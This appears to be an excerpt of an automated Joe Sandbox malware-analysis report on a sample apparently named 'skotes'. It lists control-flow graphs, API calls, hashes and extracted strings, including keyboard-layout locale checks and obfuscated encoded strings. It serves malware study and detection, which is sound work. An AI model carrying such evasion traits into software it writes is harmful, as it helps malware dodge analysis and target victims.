ea7a00 call e95c10 call e95d50 call ea7a00 call e95c10 call e95730 1852->1858 1859 e97f3f-e97f9b call ea7a00 call e95c10 call ea7a00 call e95c10 call e95d50 1852->1859 1856 e982d8-e982e2 1853->1856 1857 e982e4-e982e7 1853->1857 1862 e9833d-e98349 1854->1862 1863 e98331-e9833b 1854->1863 1860 e9830d-e98312 1855->1860 1861 e98320-e9832a 1855->1861 1856->1847 1857->1842 1864 e982e9-e982f5 1857->1864 1899 e982c3-e982cc 1858->1899 1884 e97fa0-e97fa7 1859->1884 1860->1861 1866 e98314-e9831e 1860->1866 1861->1842 1862->1847 1863->1842 1864->1847 1866->1842 1886 e97fa9 1884->1886 1887 e97fab-e97fcb call ec8bbe 1884->1887 1886->1887 1893 e97fcd-e97fdc 1887->1893 1894 e98002-e98004 1887->1894 1896 e97fde-e97fec 1893->1896 1897 e97ff2-e97fff call ead663 1893->1897 1898 e9800a-e98014 1894->1898 1894->1899 1896->1839 1896->1897 1897->1894 1898->1899 1899->1845 1901 e982ce 1899->1901 1901->1853
                                  APIs
                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E97ED3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoNativeSystem
                                  • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$pa$P
                                  • API String ID: 1721193555-4060848844
                                  • Opcode ID: 9c00b568f1439046334da9affe463195210ef07af467a6c94bac0c363bb3d2b3
                                  • Instruction ID: b1a1b1dfa2591c3efa1493cca83d0f25254a9b0cd39ff0c2193982d86bd06d77
                                  • Opcode Fuzzy Hash: 9c00b568f1439046334da9affe463195210ef07af467a6c94bac0c363bb3d2b3
                                  • Instruction Fuzzy Hash: 30E12771E04244ABDF15FB28CD073AE7BA1AB86724F94128CE4157B3D2DB758E8587C2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1953 e95ee0-e95fde 1959 e96008-e96015 call eacff1 1953->1959 1960 e95fe0-e95fec 1953->1960 1961 e95ffe-e96005 call ead663 1960->1961 1962 e95fee-e95ffc 1960->1962 1961->1959 1962->1961 1964 e96016-e9619d call ec6c6a call eae150 call ea80c0 * 5 RegOpenKeyExA 1962->1964 1982 e964b1-e964ba 1964->1982 1983 e961a3-e96233 call ec40f0 1964->1983 1984 e964bc-e964c7 1982->1984 1985 e964e7-e964f0 1982->1985 2013 e96239-e9623d 1983->2013 2014 e9649f-e964ab 1983->2014 1987 e964c9-e964d7 1984->1987 1988 e964dd-e964e4 call ead663 1984->1988 1989 e9651d-e96526 1985->1989 1990 e964f2-e964fd 1985->1990 1987->1988 1992 e965d7-e965df call ec6c6a 1987->1992 1988->1985 1996 e96528-e96533 1989->1996 1997 e96553-e9655c 1989->1997 1994 e964ff-e9650d 1990->1994 1995 e96513-e9651a call ead663 1990->1995 1994->1992 1994->1995 1995->1989 2004 e96549-e96550 call ead663 1996->2004 2005 e96535-e96543 1996->2005 1999 e9655e-e96569 1997->1999 2000 e96585-e9658e 1997->2000 2008 e9657b-e96582 call ead663 1999->2008 2009 e9656b-e96579 1999->2009 2010 e965bb-e965d6 call eacff1 2000->2010 2011 e96590-e9659f 2000->2011 2004->1997 2005->1992 2005->2004 2008->2000 2009->1992 2009->2008 2020 e965b1-e965b8 call ead663 2011->2020 2021 e965a1-e965af 2011->2021 2016 e96499 2013->2016 2017 e96243-e96279 RegEnumValueA 2013->2017 2014->1982 2016->2014 2024 e9627f-e9629e 2017->2024 2025 e96486-e9648d 2017->2025 2020->2010 2021->1992 2021->2020 2028 e962a0-e962a5 2024->2028 2025->2017 2029 e96493 2025->2029 2028->2028 2031 e962a7-e962fb call ea80c0 call ea7a00 * 2 call e95d50 2028->2031 2029->2016 2031->2025
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                  • API String ID: 0-3963862150
                                  • Opcode ID: 9cca0abaff2fe43a74626ede54bab3e6b190f06ff143b577793048713e3cc2ec
                                  • Instruction ID: b2505d21f0583024adc77c9fd62aa9e96bb8a75a844a07bcfdcaac746388dd67
                                  • Opcode Fuzzy Hash: 9cca0abaff2fe43a74626ede54bab3e6b190f06ff143b577793048713e3cc2ec
                                  • Instruction Fuzzy Hash: 8FD1CE719002589BEF24DF24CC84BDEB7B9EB05304F5042D9E509FB291DB74AAA88F94

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: a$a
                                  • API String ID: 3472027048-2001862489
                                  • Opcode ID: 4672fecd189e4700ac39ba238f3cddaaa4b3a7087ce02655a0cbc8c6bf53b1b0
                                  • Instruction ID: ebfb8f5f31c1c16592680a4d595e2f88f554527130982fff67271b73fde58fe2
                                  • Opcode Fuzzy Hash: 4672fecd189e4700ac39ba238f3cddaaa4b3a7087ce02655a0cbc8c6bf53b1b0
                                  • Instruction Fuzzy Hash: 5DF0D671A00644ABC601BB798C0271EBBB4EB4B760F841658E8217B2D1DB702A0587D2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2221 e98380-e98401 call ec40f0 2225 e9840d-e98435 call ea7a00 call e95c10 2221->2225 2226 e98403-e98408 2221->2226 2234 e98439-e9845b call ea7a00 call e95c10 2225->2234 2235 e98437 2225->2235 2227 e9854f-e9856b call eacff1 2226->2227 2240 e9845d 2234->2240 2241 e9845f-e98478 2234->2241 2235->2234 2240->2241 2244 e984a9-e984d4 2241->2244 2245 e9847a-e98489 2241->2245 2248 e98501-e98522 2244->2248 2249 e984d6-e984e5 2244->2249 2246 e9848b-e98499 2245->2246 2247 e9849f-e984a6 call ead663 2245->2247 2246->2247 2254 e9856c-e98571 call ec6c6a 2246->2254 2247->2244 2252 e98528-e9852d 2248->2252 2253 e98524-e98526 GetNativeSystemInfo 2248->2253 2250 e984f7-e984fe call ead663 2249->2250 2251 e984e7-e984f5 2249->2251 2250->2248 2251->2250 2251->2254 2258 e9852e-e98535 2252->2258 2253->2258 2258->2227 2263 e98537-e9853f 2258->2263 2264 e98548-e9854b 2263->2264 2265 e98541-e98546 2263->2265 2264->2227 2266 e9854d 2264->2266 2265->2227 2266->2227
                                  APIs
                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 00E98524
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoNativeSystem
                                  • String ID: pa
                                  • API String ID: 1721193555-338722474
                                  • Opcode ID: 1f0f571569ce32568e9804870f539b050a6317cb7a26a78e71ff8890a97b39f6
                                  • Instruction ID: 7c0fbd5ee095a01eae1afeb06ee37509ad5f93852e457a8569107157c4e418c5
                                  • Opcode Fuzzy Hash: 1f0f571569ce32568e9804870f539b050a6317cb7a26a78e71ff8890a97b39f6
                                  • Instruction Fuzzy Hash: 4F512571D042089BEF28EB78CE45BDEB7B4DF46314F505298E815B7291DF319E848B91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2301 4ad0740-4ad07a0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2960317464.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4ad0000_skotes.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec9994e0a7386bb576dfb4f9caf14f87a1220d07d2b55b2eeb249f89290d3a6a
                                  • Instruction ID: 613f4ad26a91a1f6cc82635cc65b8ff96333b7908f294e3fd627db53ffa6005b
                                  • Opcode Fuzzy Hash: ec9994e0a7386bb576dfb4f9caf14f87a1220d07d2b55b2eeb249f89290d3a6a
                                  • Instruction Fuzzy Hash: 23E0B6FB68C150BD714290823B089F6AB7EE4D36757318477F403C5846F6C51A0D7531
                                  APIs
                                    • Part of subcall function 00EA7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA7AEC
                                    • Part of subcall function 00EA7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7AF8
                                    • Part of subcall function 00EA7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7B01
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00EA08B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                  • String ID: mxo1L0x$"$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$GnNoc2Hc$L1$MGE+$MQ==$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                  • API String ID: 4234742559-3200787904
                                  • Opcode ID: bb516110aadf0d18ba50897e2cde74f28f568a52c95bf409f2a7610301b086ac
                                  • Instruction ID: c410571701879ff9db6717c47e559e1a9fe575b255b61e949f7761a1c203ff8e
                                  • Opcode Fuzzy Hash: bb516110aadf0d18ba50897e2cde74f28f568a52c95bf409f2a7610301b086ac
                                  • Instruction Fuzzy Hash: 2E231C71A001449BEF1CDB38CD8979DBBB2EF86304F149198E449FB3D6DB359A848B91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 85f288da413e20062a65cede5f448619aec9e7cde497f207dff23ba4d4b59b7d
                                  • Instruction ID: 0ddf8b8eefd371eea50fc9b2fc4e7561c4f22229fd75c71e5cb305a74e4fbd95
                                  • Opcode Fuzzy Hash: 85f288da413e20062a65cede5f448619aec9e7cde497f207dff23ba4d4b59b7d
                                  • Instruction Fuzzy Hash: E2C217B1E046288FDB25CE28DD407EAB7B5EB58305F1451ABD84DB7380E775AE828F41
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                  • Instruction ID: 2631b5e52f9840f1b0d146687bbc99a8c16c5432f6b24132434e0e7a49b2fcf2
                                  • Opcode Fuzzy Hash: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
                                  • Instruction Fuzzy Hash: F8F12C71E012199BDF14CFA8C8806ADB7B1FF58314F25826ED919BB385D731AE02CB90
                                  APIs
                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00EACF52,?,?,?,?,00EACF87,?,?,?,?,?,?,00EAC4FD,?,00000001), ref: 00EACC03
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$FilePreciseSystem
                                  • String ID:
                                  • API String ID: 1802150274-0
                                  • Opcode ID: aa42f19425f6babeac861acb3862874d6301d9a0a66e438ed2af787a76a30a64
                                  • Instruction ID: 67fce372397d63be527cdef2ae98958bc4304ccf52271fb4671c7d080158b5d5
                                  • Opcode Fuzzy Hash: aa42f19425f6babeac861acb3862874d6301d9a0a66e438ed2af787a76a30a64
                                  • Instruction Fuzzy Hash: 74D022325021389B8A113B85EC008ADFB88CB8EB683031012FA083F220CA507C80CBD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                  • Instruction ID: 70972ef803b1c898ff52d8d4535f77c2b53e9d13d0d9d29b6513f29eff58f4e7
                                  • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                  • Instruction Fuzzy Hash: 8D514F3070878856EB3846284BD6FFE67D6AB52308F14351DE4C2F7292CE639D4BC651
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0e036ef4a713a00d93a3ef42d041e042379b87057a5696ba33ad2071ff4048a
                                  • Instruction ID: ed5d70144a18e2f7271b33ee09e5a95d615a71c64f54e9f68974fb15528f9ba8
                                  • Opcode Fuzzy Hash: d0e036ef4a713a00d93a3ef42d041e042379b87057a5696ba33ad2071ff4048a
                                  • Instruction Fuzzy Hash: 842260B3F515144BDB0CCB9DDCA27ECB2E3AFD8218B0E903DA40AE3345EA79D9158644
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
